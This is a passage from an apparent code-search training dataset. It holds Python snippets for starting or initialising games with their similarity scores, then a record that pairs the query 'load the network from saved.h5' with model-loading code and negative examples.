listToAdd=self.centralDeck)\n\n # =-=-=-= Preparing requires =-=-=-= #\n await self.createRole(ctx=ctx)\n self.msgToDelete.append(await ctx.message.channel.send(\"Création du village ...\"))\n print(\"Create village ...\")\n self.lastVoiceChannel = ctx.author.voice.channel\n await self.deleteCategory(ctx=ctx, reason=\"Pas de dualité de channel.\")\n await self.createGameSpace(ctx=ctx)\n await self.movePlayer(ctx=ctx, voiceChannel=self.voiceChannel, reason=\"Début de partie.\")\n\n print(\"Game started\")\n self.msgToDelete.append(await ctx.message.channel.send(\"Début de la partie.\"))\n\n await ctx.channel.send(\"Cleaning all messages ...\")\n await self.delAllMsg(waitingTime=5)\n await self.playGame(ctx=ctx)", "def run_game_logic(self):\n pass", "def create_new_game(game_name, player_name, points_to_win=POINTS_TO_WIN,\n min_players=MIN_PLAYERS, max_players=MAX_PLAYERS):\n do_house_keeping()\n if not can_create_new_game():\n return {}\n game_name = game_name or generate_game_name()\n player_name = player_name or generate_player_name()\n points_to_win = points_to_win or POINTS_TO_WIN\n min_players = min_players or MIN_PLAYERS\n max_players = max_players or MAX_PLAYERS\n if min_players < 2:\n min_players = 2\n if max_players > 10:\n max_players = 10\n game_id = generate_id(GAME_ID_LENGTH)\n game_data = {\n 'id': game_id,\n 'name': game_name,\n 'deck': create_deck(),\n 'stack': [],\n 'created_at': serialize_datetime(datetime.utcnow()),\n 'started_at': None,\n 'ended_at': None,\n 'active': False,\n 'reverse': False,\n 'min_players': min_players,\n 'max_players': max_players,\n 'players': [],\n 'points_to_win': points_to_win\n }\n add_player_to_game(game_data, player_name, True)\n msg = make_info_message(\n 'Click \"Start\" after all player(s) have joined')\n flash_broadcast(game_data, msg)\n result = save_state(game_data)\n if result:\n return game_data\n return {}", "def main():\n pygame.init()\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n pygame.display.set_caption('8-Puzzle game')\n screen = pygame.display.set_mode((800, 500))\n fpsclock = pygame.time.Clock()\n program = SlidePuzzle((3, 3), 160, 5, difficulty=10) # program is also the gym environment\n\n choice = program.selectPlayerMenu(fpsclock, screen)\n if choice == \"AI\":\n pygame.display.quit()\n trainAI(program)\n elif choice == \"human\":\n launchWithGUI(program, fpsclock, screen)\n del program", "def new_game(self, wid, data=None):\n \n self.stop_game(0)\n\n # Slight delay for improved UX\n Fl.add_timeout(0.3, self.play_seq)", "def start_game(self) -> None:\n self.init_game()\n self.play()", "def create_game(cls, user, misses_allowed, secret_word, current_solution):\n game = cls(parent=user,\n user=user,\n misses_allowed=misses_allowed,\n misses_remaining=misses_allowed,\n secret_word=secret_word,\n current_solution=current_solution)\n game.put()\n return game", "def create_game(game_ID):\n\n if r.exists(\"state:\" + game_ID) == 1:\n raise Exception(\"Game exists already\")\n\n new_game = {\n \"winner\": \"none\",\n \"turn\": \"blue\",\n \"action\": \"spymaster\",\n \"hint\": \"\",\n \"attemptsLeft\": 0,\n \"redPoints\": 0,\n \"bluePoints\": 0,\n }\n words = create_board()\n set_fields = r.hset(\"state:\" + game_ID, mapping=new_game)\n set_fields += r.hset(\"words:\" + game_ID, mapping=words)\n\n if set_fields == 32:\n return {\"playerState\": new_game, \"wordsState\": words}\n else:\n raise Exception(\"Could not make Game\")", "def __init__(self, players=None):\n self.game = Game()\n if players:\n self.player1 = players[0]\n self.player2 = players[1]\n else:\n self.player1 = Player('X')\n self.player2 = Player('O')\n self.record = Record()\n self.winning_moves = []", "def __init__(self, game='pong', obs_type='ram', frameskip=(2, 5), repeat_action_probability=0.):\n\n utils.EzPickle.__init__(self, game, obs_type)\n assert obs_type in ('ram', 'image')\n\n self.game_path = atari_py.get_game_path(game)\n if not os.path.exists(self.game_path):\n raise IOError('You asked for game %s but path %s does not exist'%(game, self.game_path))\n self._obs_type = obs_type\n self.frameskip = frameskip\n self.ale = ALEInterface()\n self.viewer = None\n\n # Tune (or disable) ALE's action repeat:\n # https://github.com/openai/gym/issues/349\n assert isinstance(repeat_action_probability, (float, int)), \"Invalid repeat_action_probability: {!r}\".format(repeat_action_probability)\n self.ale.setFloat('repeat_action_probability'.encode('utf-8'), repeat_action_probability)\n\n self._seed()\n\n (screen_width, screen_height) = self.ale.getScreenDims()\n self._buffer = np.empty((screen_height, screen_width, 3), dtype=np.uint8)\n\n self._action_set = self.ale.getMinimalActionSet()\n self.action_space = spaces.Discrete(len(self._action_set))\n\n (screen_width,screen_height) = self.ale.getScreenDims()\n if self._obs_type == 'ram':\n self.observation_space = spaces.Box(low=np.zeros(128), high=np.zeros(128)+255)\n elif self._obs_type == 'image':\n self.observation_space = spaces.Box(low=0, high=255, shape=(screen_height, screen_width, 3))\n else:\n raise error.Error('Unrecognized observation type: {}'.format(self._obs_type))", "def play_game(self):\n # need everyone to pass to move to next phase?\n self.deal_cards()\n self.plant_food()", "async def new_game(self, players): \r\n if len(players) != 10:\r\n return discord.Embed(title=\"Valorant 10 Man Bot\",\r\n description=\"You cannot start a game with only {} players\".format(len(players)))\r\n self.teams = {\"A\": [], \"B\" : []}\r\n self.previous_captains = self.captains\r\n self.captains = {\"A\" : None, \"B\" : None}\r\n self.nick_to_player = {get_member_name(p) : p for p in players}\r\n self.previous_players = self.remaining\r\n self.remaining = players.copy()\r\n self.turn = 1\r\n self.order = []\r\n self.map_dict = {k : True for k in self.map_dict.keys()}\r\n return discord.Embed(title=\"Valorant 10 Man Bot\",\r\n description=\"New game started\".format(len(players)))", "def new_game(cls, x_user, o_user, game_moves):\n game = Game(x_user=x_user,\n o_user=o_user,\n game_moves=game_moves,\n moves_count=0,\n game_over=False)\n game.put()\n usergame = UserGame(user=x_user, \n game_key=game.key,\n moves_count=0,\n game_over=False)\n usergame.put()\n usergame = UserGame(user=o_user, \n game_key=game.key,\n moves_count=0,\n game_over=False)\n usergame.put()\n return game", "def init_gym_pygame(game_name):\n # OpenAI gym setup \n game_name = 'gvgai-aliens-lvl0-v0'\n env = gym.make(game_name)\n env.reset()\n \n # pygame setup\n pg.init()\n height = env.observation_space.shape[0]\n width = env.observation_space.shape[1]\n screen = pg.display.set_mode((width, height))\n\n return env, screen", "def setUp(self):\r\n global ship_image\r\n self.spaceshipgame = SpaceShipGame()\r\n self.spaceshipgame.init()\r\n pos = [1,1]\r\n vel = [1,1]\r\n angle = 0\r\n image = ship_image\r\n\r\n center = [1,1]\r\n size = 1\r\n info = ImageInfo(center, size)\r\n\r\n self.ship = Ship( pos, vel, angle, image, info)", "def setUp(self):\r\n global ship_image\r\n self.spaceshipgame = SpaceShipGame()\r\n self.spaceshipgame.init()\r\n pos = [1,1]\r\n vel = [1,1]\r\n angle = 0\r\n image = ship_image\r\n\r\n center = [1,1]\r\n size = 1\r\n info = ImageInfo(center, size)\r\n\r\n self.ship = Ship( pos, vel, angle, image, info)", "def main():\n # parse arguments from the command line (argparse validates arguments)\n args = _get_args()\n # build the environment with the given ID\n env = gym.make(args.env)\n # play the environment with the given mode\n if args.mode == 'human':\n play_human(env)\n else:\n play_random(env, args.steps)", "def new_game(self):\n\n self.board = {}", "def run_gui_game():\n # Set up game\n view = GuiView()\n game = GameEngine(view)", "def __init__(self, size, block_positions, starts, player_1, player_2, \n terminal_viz, print_game_in_terminal, \n time_to_make_a_move=2, game_time=100, \n penalty_score=300, max_fruit_score=300, max_fruit_time=15):\n\n # check that each Player implements the following methods:\n self.players = [player_1, player_2]\n for player in self.players:\n assert hasattr(player, 'set_game_params')\n assert hasattr(player, 'make_move')\n assert hasattr(player, 'set_rival_move')\n assert hasattr(player, 'update_fruits')\n\n self.print_game_in_terminal = print_game_in_terminal\n self.terminal_viz = terminal_viz\n self.time_to_make_a_move = time_to_make_a_move\n self.penalty_score = penalty_score\n self.some_player_cant_move = False\n \n \n self.game_time_left_for_players = [game_time, game_time]\n\n initial_board = self.set_initial_board(size, block_positions, starts)\n\n self.game = Game(initial_board, starts, max_fruit_score=max_fruit_score, max_fruit_time=max_fruit_time, \n animated=True, animation_func=self.animate_func)\n\n for i, player in enumerate(self.players):\n player.set_game_params(self.game.get_map_for_player_i(player_id=i))", "def __init__(self):\n\n self.width = 10\n self.height = 10\n self.new_game()", "def spawn_players(self) -> None:\n # Initialise the players\n self.player1 = Player(self.sensitivity, self.screen_width, self.screen_height, self.screen_width // 2, 50,\n self.player_lives, self.fps, self.player1_bullet, Direction.DOWN, self.debug)\n self.player2 = Player(self.sensitivity, self.screen_width, self.screen_height, self.screen_width // 2,\n self.screen_height - 50, self.player_lives, self.fps, self.player2_bullet, Direction.UP,\n self.debug)\n\n # Rotate the image of the player at the top\n self.player1.rotate(180)", "def init(seed=None):\n\tglobal _game\n\n\tfrom .game import Game\n\tfrom .prompt import install_words\n\n\t_game = Game(seed)\n\tload_advent_dat(_game)\n\tinstall_words(_game)\n\t_game.start()\n\treturn _game", "def main():\n g = DemoGame(800, 600)\n g.start()", "def main(self):\n _age = info.getInfo(self)\n _flag = game.check_age(self, _age)\n if _flag == False:\n exit()\n game.wants_to_play(0)", "def main():\n\n containerTextStyle = {\n 'color': '#ffffff',\n 'font': '10px',\n 'stroke': '#000000',\n 'strokeWidth': .15\n }\n spawnerRole = Spawner()\n # Clean up memory\n for creepName in Object.keys(Memory.creeps):\n if not Game.creeps[creepName]:\n if Memory.creeps[creepName].role == \"remoteHarvester\":\n print(\"Cleaning up remoteHarvester. It mined: \" + Memory.creeps[creepName].totalHarvested)\n del Memory.creeps[creepName]\n #print(\"Clearing non-existent creep memory: \" + creepName)\n\n if Game.cpu.bucket == 10000:\n Game.cpu.generatePixel()\n # Run each creep\n for name in Object.keys(Game.creeps):\n creep = Game.creeps[name]\n if creep.memory.role in Spawner.roles:\n Spawner.roles[creep.memory.role].run(creep)\n else:\n creep.say(\"No role\")\n\n # Run tower code\n homeRoom = Object.values(Game.spawns)[0].room\n towers = [struct for room in Object.values(Game.rooms) for struct in room.find(FIND_STRUCTURES) if struct.structureType == STRUCTURE_TOWER]\n hostiles = homeRoom.find(FIND_HOSTILE_CREEPS)\n for tower in towers:\n structures = sorted([struct for struct in tower.room.find(FIND_STRUCTURES) if struct.hits < struct.hitsMax], key=lambda struct: struct.hits)\n if len(hostiles) > 0:\n tower.attack(tower.pos.findClosestByPath(hostiles))\n continue\n\n for structure in structures:\n if structure.hits < structure.hitsMax and structure.hits < 100000:\n tower.repair(structure)\n break\n\n # Run visuals\n for room in Object.values(Game.rooms):\n for container in [struct for struct in room.find(FIND_STRUCTURES) if struct.structureType == STRUCTURE_CONTAINER or struct.structureType == STRUCTURE_STORAGE]:\n room.visual.text(Spawner.roles['harvester'].getStructureFutureEnergy(container), container.pos, containerTextStyle)\n\n # Run each spawn\n for name in Object.keys(Game.spawns)[0:1]:\n spawn = Game.spawns[name]\n spawnerRole.run(spawn)", "def __init__(self, affinity, game_type, game_space, opponent=None):\n \n super().__init__(affinity, game_type, game_space, opponent)", "def __init__(self):\n self.screen = pg.display.get_surface()\n self.screen_rect = self.screen.get_rect()\n self.clock = pg.time.Clock()\n self.fps = 60\n self.keys = pg.key.get_pressed()\n self.done = False\n # ship = random.choice(list(prepare.GFX[\"ships\"].values()))\n ship = list(prepare.GFX[\"ships\"].values())[7] # pick first ship available\n self.player = actors.Player((0, 0), ship)\n self.level = level.Level(self.screen_rect.copy(), self.player)\n\n self.energyloss_counter = 0\n self.energygain_counter = 0", "def start_game(self):\n while self.can_deal:\n self.take_turn()", "def __init__(self):\n pygame.init()\n self.settings = Settings()\n self.screen = pygame.display.set_mode(\n (self.settings.screen_width, self.settings.screen_height)\n )\n pygame.display.set_caption(\"Sideways Shooter\")\n self.stats = GameStats(self)\n self.sideways_ship = SidewaysShip(self)\n self.bullets = pygame.sprite.Group()\n self.aliens = pygame.sprite.Group()\n self._create_fleet()", "def test_valid_new_game(self):\n self._game.new_game()\n self.assertIsRUNNING(self._game)\n self.assertIsNotNone(self._game.table)\n self.assertEqual(self._game.table.player_turn, 1,\n \"Game.table unsuccessful init.\")", "def start_game(self):\n self.master.destroy()\n Game()", "def do_start_hosted(self):\n\t\tself.game_name = self.e_gamename.text\n\t\tself.num_players = (1, int(self.e_players.text))\n\t\tself.boardsize = (int(self.e_boardw.text), int(self.e_boardh.text))\n\n\t\td = {\"state\": be.S_GAME,\n\t\t\t\t\"hosting\": True,\n\t\t\t\t\"uuid\": None,\n\t\t\t\t\"name\": self.game_name,\n\t\t\t\t\"nickname\": self.nickname,\n\t\t\t\t\"num_players\": self.num_players,\n\t\t\t\t\"boardsize\": self.boardsize}\n\t\tevent = pygame.event.Event(be.E_STATE, d)\n\t\tpygame.event.post(event)\n\n\t\tself.hide_all()\n\t\tself.renderer.color = (0, 0, 0, 0)", "def __init__(self, game):\n self.rooms = self.load_rooms(f\"data/{game}Rooms.txt\")\n self.current_room = self.rooms[1]\n # use self.over to determine if the game if over\n self.over = 0\n self.load_items(f\"data/{game}Items.txt\")\n self.inventory = Inventory()\n # synonyms\n self.synonyms = {}\n self.load_synonyms(\"data/SmallSynonyms.txt\")", "def run():\n\n # Set up environment and agent\n e = Environment() # create environment (also adds some dummy traffic)\n a = e.create_agent(LearningAgent) # create agent\n e.set_primary_agent(a, enforce_deadline= True ) # set agent to track\n\n # Now simulate it\n sim = Simulator(e, update_delay=0.5) # reduce update_delay to speed up simulation\n sim.run(n_trials=100) # press Esc or close pygame window to quit", "async def game(self):\n pass" ]
[ "0.6907318", "0.68599695", "0.6728783", "0.66609395", "0.6579913", "0.6554996", "0.6510835", "0.64591074", "0.64184606", "0.6393087", "0.63915473", "0.6364802", "0.6364802", "0.6364802", "0.6364802", "0.6364802", "0.6359255", "0.635703", "0.63438934", "0.6340655", "0.63222647", "0.6230765", "0.62276447", "0.6192554", "0.6190398", "0.6188919", "0.6171213", "0.61516774", "0.6145663", "0.61230963", "0.6119365", "0.61087525", "0.6093325", "0.6091152", "0.60795623", "0.60722554", "0.604758", "0.60286254", "0.60186446", "0.60133606", "0.599565", "0.5957436", "0.59409904", "0.5925056", "0.59159774", "0.59091014", "0.59082234", "0.58997315", "0.58959615", "0.5890325", "0.5882927", "0.5879657", "0.5875502", "0.5875101", "0.5868611", "0.5862463", "0.5858779", "0.5856393", "0.5846861", "0.58307624", "0.5821008", "0.5820403", "0.5797097", "0.57960445", "0.5791845", "0.5788365", "0.57852113", "0.5783713", "0.5774389", "0.5774075", "0.57694566", "0.57627225", "0.5761301", "0.57539374", "0.575246", "0.5750212", "0.5749559", "0.5748215", "0.574666", "0.574538", "0.574538", "0.5742934", "0.5740808", "0.57402307", "0.5739559", "0.5737764", "0.57328993", "0.5730632", "0.57301444", "0.57223696", "0.57221764", "0.57182056", "0.57131535", "0.5711716", "0.57010895", "0.5698529", "0.569274", "0.56916517", "0.56894803", "0.5688346", "0.56879526" ]
0.0
-1
load the network from saved.h5
def load_network(self): self.dqn.load_network(self.path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_network(self, which_epoch):\n save_filename = '%s_net.pth' % which_epoch\n load_path = os.path.join(self.save_dir, save_filename)\n net = self.net\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n net.load_state_dict(state_dict)", "def load_model(self):\n self.pred_net.load((self.save_path / \"iqn_pred_net\").absolute().as_posix())\n self.target_net.load((self.save_path / \"iqn_target_net\").absolute().as_posix())", "def load_trained_net(mal):\n model_root = os.path.join(os.getcwd(), 'data', 'models')\n model = load_model(os.path.join(model_root, 'model_' + mal + '.h5'))\n\n return model", "def load_network(self, sess, filename):\n dir_path = os.path.dirname(os.path.realpath(__file__))\n dir_path += '/Models/'\n dir_path += filename\n saver = tf.train.Saver()\n saver.restore(sess, dir_path)", "def load_network(fpath):\n\twith open(fpath, \"rb\") as f:\n\t\tnetwork = pickle.load(f)\n\treturn network", "def __load_Model(self):\r\n PrintsForUser.printProcess(\"[INFO] Loading network...\")\r\n \r\n self.__model = load_model(self.__model_path)\r\n self.__lb = pickle.loads(open(self.__labels_path, \"rb\").read())", "def load_networks(self, which_epoch):\n for name in self.model_names:\n if isinstance(name, str):\n filename = '%s_net_%s.pth' % (which_epoch, name)\n path = os.path.join(self.save_dir, filename)\n net = getattr(self, 'net_' + name)\n try:\n state_dict = torch.load(path)\n state_dict = {name.replace('module.', '', 1) : param for name, param in state_dict.items()}\n # net.load_state_dict(torch.load(path))\n net.load_state_dict(state_dict)\n except:\n pretrained_dict = torch.load(path)\n model_dict = net.state_dict()\n try:\n pretrained_dict = {k:v for k,v in pretrained_dict.items() if k in model_dict}\n net.load_state_dict(pretrained_dict)\n print('Pretrained network %s has excessive layers; Only loading layers that are used' % name)\n except:\n print('Pretrained network %s has fewer layers; The following are not initialized:' % name)\n not_initialized = set()\n for k, v in pretrained_dict.items():\n if v.size() == model_dict[k].size():\n model_dict[k] = v\n\n for k, v in model_dict.items():\n if k not in pretrained_dict or v.size() != pretrained_dict[k].size():\n not_initialized.add(k.split('.')[0])\n print(sorted(not_initialized))\n net.load_state_dict(model_dict)\n if len(self.gpu_ids) > 0 and torch.cuda.is_available():\n net.cuda()\n if not self.isTrain:\n net.eval()", "def load_networks(self, epoch):\n for name in self.network_names:\n if isinstance(name, str):\n load_filename = '{0}_net_{1}.pth'.format(epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net')\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from {0}'.format(load_path))\n state_dict = torch.load(load_path, map_location=self.device)\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n net.load_state_dict(state_dict)", "def _load_model(self):\n self._load_scaler('scaler.save')\n self._load_encoder('encoder0.save', 0)\n self._load_encoder('encoder1.save', 1)\n self._load_neural_network('model.json', 'model.h5')\n return", "def load(uDir):\n import sys\n sys.path.append(uDir)\n from net_spec import spec\n \n builder = NetworkBuilder(spec)\n htm = builder.build()\n htm.start()\n \n ## restore each node state\n layers = htm.layers\n \n for l in range(len(layers) - 1):\n (r,c) = spec[l]['shape']\n\n if layers[l].node_sharing:\n state = {}\n state['coincidences'] = np.load(uDir + str(l) + \".0.0.coincidences.npy\")\n state['temporal_groups'] = [] ## !FIXME temporal groups should be saved, first\n state['PCG'] = np.load(uDir + str(l) + \".0.0.PCG.npy\")\n\n for i in range(r):\n for j in range(c):\n layers[l].pipes[i][j].send((\"set_state\", state))\n\n else:\n for i in range(r):\n for j in range(c):\n state = {}\n state['coincidences'] = np.load(uDir + str(l) + \".\" + str(i) + \".\" + str(j) + \".coincidences.npy\")\n state['temporal_groups'] = [] ## !FIXME temporal groups should be saved, first\n state['PCG'] = np.load(uDir + str(l) + \".\" + str(i) + \".\" + str(j) + \".PCG.npy\")\n layers[l].pipes[i][j].send((\"set_state\", state))\n \n ## restore also last node's state\n state = {}\n state['coincidences'] = np.load(uDir + str(len(layers) - 1) + \".0.0.coincidences.npy\")\n state['cls_prior_prob'] = np.load(uDir + str(len(layers) - 1) + \".0.0.cls_prior_prob.npy\")\n state['PCW'] = np.load(uDir + str(len(layers) - 1) + \".0.0.PCW.npy\")\n layers[-1].pipes[0][0].send((\"set_state\", state))\n\n return htm", "def load(self, filename, path=\".\"):\n if filename is None:\n if self.verbose:\n print(\"Neural Network Model Class - Save Function: No file name\")\n return -1\n\n #trn_params\n self.trn_params = NeuralNetworkParams()\n self.trn_params.load('%s_trn_params.pickle'%(filename),path=path)\n\n #model\n json_file = open(\"%s/%s_model.json\"%(path,filename), 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n loaded_model.load_weights(\"%s/%s_model.h5\"%(path,filename))\n self.model = loaded_model\n self.trained = True\n #trn_desc\n self.trn_desc = None\n self.trn_desc = pickle.load(open(\"%s/%s_trn_desc.pickle\"%(path,filename), \"rb\"))", "def load_all(self, file):\n self.model = load_model(file + \"_model.h5\")", "def _load_local_weights(self, h5file):\n for name, layer in self._layers_to_save.items():\n self._load_layer_weights(layer, name, h5file)", "def load_hdf5_with_structure(file):\n n_classes = 80\n n_boxes = 5\n anchors = [[0.738768, 0.874946], [2.42204, 2.65704], [4.30971, 7.04493], [10.246, 4.59428], [12.6868, 11.8741]]\n\n yolov2 = YOLOv2(n_classes=n_classes, n_boxes=n_boxes)\n chainer.serializers.load_hdf5(file, yolov2)\n model = YOLOv2Predictor(yolov2)\n model.init_anchor(anchors)\n #model.predictor.train = False\n model.predictor.finetune = False\n return model", "def load(self, uri):\r\n self._encoder = load_model(uri+\"_lstm_encoder.hdf5\")\r\n self._autoencoder = load_model(uri+\"_lstm_autoencoder.hdf5\")\r\n\r\n pf = PyFolder(os.path.dirname(os.path.realpath(uri)))\r\n dict_options = pf[os.path.basename(uri)+\"_options.json\"]\r\n\r\n self._latent_space = dict_options['latent_space']\r\n self._input_cells = dict_options['input_cells']", "def load(self, filename):\n hebbian_weights = open(filename, \"r\").read().split('\\n')\n for i in xrange(self.hidden):\n weights = hebbian_weights[i].split('\\t')\n self.vis_layer[i].set_weights(weights)\n for i in xrange(self.layers):\n for j in xrange(self.hidden):\n weights = hebbian_weights[((i+1)*self.hidden)+j].split('\\t')\n self.hidden_layers[i][j].set_weights(weights)\n weights = hebbian_weights[-2].split('\\t')\n self.output_neuron.set_weights(weights)", "def load_networks(self, epoch):\n for name in self.model_names:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)", "def restore_model(self, path):\n # if cuda is not available load everything to cpu\n if not self.use_cuda:\n state = torch.load(path, map_location=lambda storage, loc: storage)\n else:\n state = torch.load(path)\n self.net.load_state_dict(state['state_dict'])\n self.optimizer.load_state_dict(state['optimizer'])\n self.epoch_counter = state['epoch'] # counts number of epochs", "def load_model(self, path):\n self._saver.restore(self._sess, path + '/model.ckp')\n pkl_file = open(path + '/som.pkl', 'rb')\n restored = pickle.load(pkl_file)\n pkl_file.close()\n self._m = restored['_m']\n self._n = restored['_n']\n self._neighbourhood = restored['_neighbourhood']\n # self._topography = restored['_topography']\n self._num_iterations = restored['_num_iterations']\n self._Wts = restored['_Wts']\n self._locations = restored['_locations']\n self._learned = restored['_learned']\n self._centroid_grid = restored['_centroid_grid']\n self.abnormal_dist = restored['abnormal_dist']\n\n print(\"Model restored from path: \" + path)", "def load(self, path):\n print('Loading model from {}'.format(path.name))\n self.qnetwork_local.load_state_dict(torch.load(path))\n self.qnetwork_target.load_state_dict(torch.load(path))\n return", "def load(self, path, nr_of_saves, test_it=-1):\n with self.graph.as_default():\n print(\"Loading networks...\")\n checkpoint_dir = os.path.join(os.environ['APPROXIMATOR_HOME'], path, \"network-\"+str(test_it))\n self.saver = tf.train.Saver(max_to_keep=nr_of_saves+1)\n try:\n self.saver.restore(self.sess, checkpoint_dir)\n print(\"Loaded: {}\".format(checkpoint_dir))\n except Exception:\n if test_it <= 0:\n # Initialize the variables\n self.sess.run(tf.global_variables_initializer())\n print(\"Failed! Initializing the network variables...\")\n else:\n raise", "def model_load(file_name=None):\n if file_name is None :\n file_name = \"./data/_oP5_SegmentClassifier.dump\"\n else:\n pass\n\n return p5_util.object_load(file_name)", "def load_networks(self, epoch: int) -> None:\n for name, module in self.modules.items():\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n if isinstance(module, torch.nn.DataParallel):\n module = module.module\n print('loading the model from %s' % load_path)\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, module, key.split('.'))\n module.load_state_dict(state_dict)\n return", "def load_model_from_checkpoint(self, path: str):\n ckpt = torch.load(path, map_location='cpu')\n self.net_q.encoder.load_state_dict(ckpt['encoder'])\n self.net_q.head.load_state_dict(ckpt['head'])\n self.net_ps.load_state_dict(ckpt['net_ps'])\n self.net_k.load_state_dict(ckpt['net_k'])\n self.queue.load_state_dict(ckpt['queue'])\n self.optimizer.load_state_dict(ckpt['optimizer'])\n if 'scheduler' in ckpt:\n self.scheduler.load_stae_dict(ckpt['scheduler'])\n self.move_optimizer_states(self.optimizer, self.local_rank)", "def load(self, name, path=None):\n if path is None:\n path = '.'\n if path[0] == '~':\n path = os.getenv(\"HOME\") + path[1:]\n\n try:\n with open(path + '/' + name, 'rb') as f:\n return pickle.load(f)\n except IOError as e:\n msg = str(e) + '\\nNeuralNetwork.load failed.'\n raise DNNetIOError(msg)", "def loadh5(fname, path='/data'):\n fp = open_read(fname)\n slab = fp.get_node(path)\n mat = slab.read()\n fp.close()\n return mat", "def load_network_for_training(file_name):\n global training_set, start_round, start_digit\n try:\n with open (file_name, 'r') as f:\n w = np.load(f)\n w_min = np.load(f)\n w_max = np.load(f)\n a_plus = np.load(f)\n a_minus = np.load(f)\n b_plus = np.load(f)\n b_minus = np.load(f)\n v_th = np.load(f)\n training_set = np.reshape(np.load(f), (TRAINING_SIZE, N))\n start_round = np.load(f)\n start_digit = np.load(f)\n\n Output.set_states({'v_th' : v_th})\n S.set_states({\n 'w' : w,\n 'w_min' : w_min, \n 'w_max' : w_max, \n 'a_plus' : a_plus, \n 'a_minus' : a_minus, \n 'b_plus' : b_plus, \n 'b_minus' : b_minus\n })\n print start_round\n print start_digit\n print v_th\n except IOError as e:\n print \"error opening file: %s\" % e.strerror\n sys.exit()", "def load_bytes_subnetwork_pretrained_weights(self, model):\n print(\"ToImplement\")", "def export_to_hdf5(cls, h5_file, model, loads):\n #encoding = model._encoding\n #comments = []\n sid = []\n node = []\n cid = []\n mag = []\n xyz = []\n for load in loads:\n #comments.append(loads.comment)\n sid.append(load.sid)\n node.append(load.node)\n cid.append(load.cid)\n mag.append(load.mag)\n xyz.append(load.xyz)\n\n #h5_file.create_dataset('_comment', data=comments)\n h5_file.create_dataset('sid', data=sid)\n h5_file.create_dataset('node', data=node)\n h5_file.create_dataset('cid', data=cid)\n h5_file.create_dataset('mag', data=mag)\n h5_file.create_dataset('xyz', data=xyz)", "def load(self, name=\"\"):\n\n self.constructed = True\n if name == \"\":\n name = \"/home/unai/Escritorio/MultiNetwork/model/model\"\n\n network_descriptors = {\"Generic\": GenericDescriptor, \"Decoder\": DecoderDescriptor, \"Discrete\": DiscreteDescriptor, \"Convolution\": ConvolutionDescriptor}\n\n if not os.path.isfile(name):\n print(\"Error at loading the model\")\n return None\n\n f = open(name, \"r+\")\n\n lines = f.readlines()\n\n i = 0\n while lines[i] != \"\\n\": # Each component is stored in a line\n ident, n_inp, kind, n_hidden, layers, init, act, cond_rand, taking, producing, depth, reachable, belows = lines[i][:-1].split(\"_\")\n kwargs = {}\n if int(ident[1:]) > self.last_net:\n self.last_net = int(ident[1:])\n\n self.reachable[ident] = reachable.split(\",\")\n self.comps_below[ident] = belows.split(\",\")\n\n if \"onv\" in kind: # Not working right now\n filters, sizes, layers, strides = layers.split(\"*\")\n sizes = sizes.split(\",\")\n s = np.array([[int(sz) for sz in szs.split(\"/\")] for szs in sizes])\n desc = network_descriptors[kind](int(inp), int(outp), int(n_inp), layers.split(\",\"), filters.split(\",\"), [int(x) for x in strides.split(\",\")], s, [int(x) for x in act.split(\",\")], [int(x) for x in init.split(\",\")], kwargs)\n else:\n if len(kwargs) > 0: # Not working right now\n kwargs = kwargs.split(\"-\")\n kwargs[0] = [int(x) for x in kwargs[0].split(\".\") if len(x) > 0]\n kwargs[1] = [int(x) for x in kwargs[1].split(\".\") if len(x) > 0]\n if len(cond_rand) > 0:\n cond_rand = cond_rand.split(\"-\")\n cond_rand[0] = [int(x) for x in cond_rand[0].split(\",\") if len(x) > 0]\n cond_rand[1] = [int(x) for x in cond_rand[1].split(\",\") if len(x) > 0]\n kwargs[\"conds\"] = cond_rand\n desc = network_descriptors[kind](int(taking.split(\",\")[0]), int(producing.split(\",\")[0]), int(n_inp), int(n_hidden), [int(x) for x in layers.split(\",\") if x != \"-1\"], init_functions[[int(x) for x in init.split(\",\") if x != \"-1\"]],\n act_functions[[int(x) for x in act.split(\",\") if x != \"-1\"]], **kwargs)\n\n # print(\"ident\", ident, \"n_inp\", n_inp, \"kind\", kind, \"inp\", inp, \"outp\", outp, \"layers\", layers, \"init\", init, \"act\", act, \"taking\", taking, \"producing\", producing, \"depth\", depth, \"kwargs\", kwargs)\n net = NetworkComp(desc, InOut(size=int(taking.split(\",\")[0]), data_type=taking.split(\",\")[1]), InOut(data_type=producing.split(\",\")[1], size=int(producing.split(\",\")[0])), int(depth))\n\n self.add_net(net, ident)\n i += 1\n\n i += 1\n\n while lines[i] != \"\\n\": # Inputs\n\n ident, size, kind, depth = lines[i].split(\"_\")\n\n self.inputs[ident] = ModelComponent(None, InOut(size=int(size), data_type=kind), int(depth))\n i += 1\n\n i += 1\n\n while lines[i] != \"\\n\": # Outputs\n\n ident, size, kind, depth, belows = lines[i].split(\"_\")\n\n self.outputs[ident] = ModelComponent(InOut(size=int(size), 